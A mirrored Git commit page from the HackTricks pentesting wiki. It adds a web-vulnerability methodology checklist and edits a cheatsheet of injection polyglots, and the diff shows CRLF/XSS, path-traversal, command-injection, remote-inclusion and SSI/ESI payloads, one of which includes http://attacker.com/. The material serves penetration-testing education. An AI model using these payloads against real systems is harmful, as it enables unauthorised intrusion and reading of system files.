Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 4 pages modified

Browse source
This commit is contained in:
CPol 2021-06-26 12:03:36 +00:00 committed by gitbook-bot
parent 2409d799fe
commit 8a3bbdc0ec
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 155 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -336,6 +336,7 @@
## Pentesting Web ## Pentesting Web
* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet.md) * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet.md)
* [2FA/OTP Bypass](pentesting-web/2fa-bypass.md) * [2FA/OTP Bypass](pentesting-web/2fa-bypass.md)
* [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) * [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)

2
pentesting-web/2fa-bypass.md
View file

@ -47,7 +47,7 @@ There is a rate limit but when you "resend the code" the same code is sent and t
#### Client side rate limit bypass #### Client side rate limit bypass
[Read this post.](rate-limit-bypass.md) {% page-ref page="rate-limit-bypass.md" %}
#### Lack of rate limit in user's account #### Lack of rate limit in user's account

36
pentesting-web/pocs-and-polygloths-cheatsheet.md
View file

@ -3,6 +3,25 @@
The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**. The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**.
You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure. You **won't find Content-Type dependant injections like XXE**, as usually you will try those yourself if you find a request sending xml data. You **won't also find database injections** here as even if some content might be reflected it depends heavily on the backend DB technology and structure.
* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)\*\*\*\*
* [ ] \*\*\*\*[**Command Injection**](command-injection.md)\*\*\*\*
* [ ] \*\*\*\*[**CRLF**](crlf-0d-0a.md)\*\*\*\*
* [ ] \*\*\*\*[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)\*\*\*\*
* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\*
* [ ] [**Open Redirect**](open-redirect.md)\*\*\*\*
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\*
* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)\*\*\*\*
* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)\*\*\*\*
* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)\*\*\*\*
* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\*
* [ ] [**XSS**](xss-cross-site-scripting/)\*\*\*\*
* [ ] \*\*\*\*[**XSSI**](xssi-cross-site-script-inclusion.md)\*\*\*\*
* [ ] \*\*\*\*[**XS-Search**](xs-search.md)\*\*\*\*
## Polygloths list ## Polygloths list
```python ```python
@ -13,6 +32,7 @@ You **won't find Content-Type dependant injections like XXE**, as usually you wi
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd /etc/passwd
../../../../../../etc/hosts ../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts ..\..\..\..\..\..\etc/hosts
@ -92,6 +112,14 @@ $(ls)
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
``` ```
## Dangling Markup
### Basic Tests
```markup
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
```
## [File Inclusion/Path Traversal](file-inclusion/) ## [File Inclusion/Path Traversal](file-inclusion/)
### Basic Tests ### Basic Tests
@ -109,10 +137,6 @@ http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php \\asdasdasdasd.burpcollab.com/mal.php
``` ```
## [File Upload](file-upload/)
{% page-ref page="file-upload/" %}
## [Open Redirect](open-redirect.md) / [Server Side Request Forgery](ssrf-server-side-request-forgery.md) ## [Open Redirect](open-redirect.md) / [Server Side Request Forgery](ssrf-server-side-request-forgery.md)
### Basic Tests ### Basic Tests
@ -152,6 +176,10 @@ x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/C
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>> <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
``` ```
## [Server Side Request Forgery](ssrf-server-side-request-forgery.md)
The same tests used for Open Redirect can be used here.
## [Server Side Template Injection](ssti-server-side-template-injection/) ## [Server Side Template Injection](ssti-server-side-template-injection/)
### Basic Tests ### Basic Tests

121
pentesting-web/web-vulnerabilities-methodology.md Normal file
View file

@ -0,0 +1,121 @@
# Web Vulnerabilities Methodology
In every pentest web there is **several hidden and obvious places that might be vulnerable**. This post is meant to be a checklist to confirma that you have searched vulnerabilities in all the posible places.
## Proxies
{% hint style="info" %}
Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be \(ab\)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend.
{% endhint %}
* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)\*\*\*\*
* [ ] \*\*\*\*[**Cache Poisoning/Cache Deception**](cache-deception.md)\*\*\*\*
* [ ] \*\*\*\*[**HTTP Request Smuggling**](http-request-smuggling.md)\*\*\*\*
* [ ] \*\*\*\*[**H2C Smuggling**](h2c-smuggling.md)\*\*\*\*
* [ ] \*\*\*\*[**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\*
* [ ] \*\*\*\*[**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\*
## **User input**
{% hint style="info" %}
Most of the web applications will **allow users to input some data that will be processed later.**
Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply.
{% endhint %}
### **Reflected Values**
If the introduced data may somehow being reflected in the response, the page might be vulnerable to several issues.
* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)\*\*\*\*
* [ ] \*\*\*\*[**Command Injection**](command-injection.md)\*\*\*\*
* [ ] \*\*\*\*[**CRLF**](crlf-0d-0a.md)\*\*\*\*
* [ ] \*\*\*\*[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)\*\*\*\*
* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\*
* [ ] [**Open Redirect**](open-redirect.md)\*\*\*\*
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)\*\*\*\*
* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)\*\*\*\*
* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)\*\*\*\*
* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)\*\*\*\*
* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)\*\*\*\*
* [ ] [**XSS**](xss-cross-site-scripting/)\*\*\*\*
* [ ] \*\*\*\*[**XSSI**](xssi-cross-site-script-inclusion.md)\*\*\*\*
* [ ] \*\*\*\*[**XS-Search**](xs-search.md)\*\*\*\*
Some of the mentioned vulnerabilities requires special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in:
{% page-ref page="pocs-and-polygloths-cheatsheet.md" %}
### **Search functionalities**
If the functionality may be used to search some kind of data inside the backend, maybe you can \(ab\)use it to search arbitrary data.
* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)\*\*\*\*
* [ ] \*\*\*\*[**NoSQL Injection**](nosql-injection.md)\*\*\*\*
* [ ] \*\*\*\*[**LDAP Injection**](ldap-injection.md)\*\*\*\*
* [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md)
* [ ] [**SQL Injection**](sql-injection/)\*\*\*\*
* [ ] [**XAPTH Injection**](xpath-injection.md)\*\*\*\*
### **Forms, WebSockets and PostMsgs**
When websocket, post message or a form allows user to perform actions vulnerabilities may arise.
* [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)\*\*\*\*
* [ ] [**Cross-site WebSocket hijacking \(CSWSH\)**](cross-site-websocket-hijacking-cswsh.md)\*\*\*\*
* [ ] \*\*\*\*[**PostMessage Vulnerabilities**](postmessage-vulnerabilities.md)\*\*\*\*
### **HTTP Headers**
Depending on the HTTP headers given by the web server some vulnerabilities might be present.
* [ ] [**Clickjacking**](clickjacking.md)\*\*\*\*
* [ ] \*\*\*\*[**Content Security Policy bypass**](content-security-policy-csp-bypass.md)\*\*\*\*
* [ ] \*\*\*\*[**Cookies Hacking**](hacking-with-cookies.md)\*\*\*\*
* [ ] \*\*\*\*[**CORS - Misconfigurations & Bypass**](cors-bypass.md)\*\*\*\*
### **Bypasses**
There are several specific functionalities were some workarounds might be useful to bypass them
* [ ] \*\*\*\*[**2FA/OPT Bypass**](2fa-bypass.md)\*\*\*\*
* [ ] \*\*\*\*[**Bypass Payment Process**](bypass-payment-process.md)\*\*\*\*
* [ ] \*\*\*\*[**Captcha Bypass**](captcha-bypass.md)\*\*\*\*
* [ ] \*\*\*\*[**Race Condition**](race-condition.md)\*\*\*\*
* [ ] \*\*\*\*[**Rate Limit Bypass**](rate-limit-bypass.md)\*\*\*\*
* [ ] \*\*\*\*[**Reset Forgotten Password Bypass**](reset-password.md)\*\*\*\*
### **Structured objects / Specific functionalities**
Some functionalities will require the **data to be structured on a very specific format** \(like a language serialized object or a XML\). Therefore, it's more easy to identify is the application might be vulnerable as it needs to be processing that kind of data.
Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** \(like Email Header Injections\).
* [ ] \*\*\*\*[**Deserialization**](deserialization/)\*\*\*\*
* [ ] \*\*\*\*[**Email Header Injection**](email-header-injection.md)\*\*\*\*
* [ ] \*\*\*\*[**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)\*\*\*\*
* [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)\*\*\*\*
### Files
Functionalities that allow to upload files might be vulnerable to several issues.
Functionalities that generates files including user input might execute unexpected code.
Users that open files uploaded by users or automatically generated including user input might be compromised.
* [ ] [**File Upload**](file-upload/)\*\*\*\*
* [ ] \*\*\*\*[**Formula Injection**](formula-injection.md)\*\*\*\*
* [ ] \*\*\*\*[**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)\*\*\*\*
* [ ] \*\*\*\*[**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)\*\*\*\*
### **External Identity Management**
* [ ] \*\*\*\*[**OAUTH to Account takeover**](oauth-to-account-takeover.md)\*\*\*\*
* [ ] \*\*\*\*[**SAML Attacks**](saml-attacks/)\*\*\*\*
### **Other Helpful Vulnerabilities**
This vulnerabilities might help to exploit other vulnerabilities.
* [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)\*\*\*\*
* [ ] \*\*\*\*[**IDOR**](idor.md)\*\*\*\*
* [ ] [**Parameter Pollution**](parameter-pollution.md)\*\*\*\*
* [ ] \*\*\*\*[**Unicode Normalization vulnerability**](unicode-normalization-vulnerability.md)\*\*\*\*